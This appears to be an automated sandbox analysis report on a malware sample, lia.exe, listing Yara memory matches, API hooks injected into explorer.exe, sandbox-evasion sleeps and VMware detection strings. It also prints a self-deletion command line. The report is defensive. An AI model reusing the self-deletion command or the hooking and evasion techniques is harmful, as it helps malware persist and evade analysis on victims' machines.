Source: Yara match	File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR
Source: Yara match	File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Self deletion via cmd delete

Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lia.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lia.exe

Modifies the export address table of user mode modules (user mode EAT hooks)

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFD8893521C

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Modifies the import address table of user mode modules (user mode IAT hooks)

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFD88935200

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\lia.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\lia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\lia.exe TID: 6364	Thread sleep time: -90000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068	Thread sleep time: -6456360425798339s >= -30000s			Jump to behavior

Found evasive API chain (date check)

Source: C:\Users\user\Desktop\lia.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\cmd.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5398			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3959			Jump to behavior

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\cmd.exe

API coverage: 3.9 %

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.dll			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\lia.exe

1_2_039E8409

Source: explorer.exe, 00000016.00000000.508063004.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000016.00000000.543082281.00000000083E0000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000016.00000000.506696613.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000016.00000000.543082281.00000000083E0000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: RuntimeBroker.exe, 00000021.00000000.563490355.0000021DB5A53000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000016.00000000.506696613.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000016.00000000.542857487.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: RuntimeBroker.exe, 00000024.00000000.640630745.0000021910A2A000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}l
Source: mshta.exe, 0000000B.00000003.423217219.000002480E9FE000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000016.00000000.542857487.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000016.00000000.508063004.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000016.00000000.521348094.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Source: C:\Users\user\Desktop\lia.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039F2ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_039F2ECF
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039EB9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	1_2_039EB9D4
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039DE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_039DE91D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036BE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	44_2_036BE91D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036CB9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,	44_2_036CB9D4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036D2ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,	44_2_036D2ECF

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_004012E6 LoadLibraryA,GetProcAddress,

1_2_004012E6

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D16AF ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,		1_2_039D16AF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036B16AF ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,		44_2_036B16AF

HIPS / PFW / Operating System Protection Evasion:

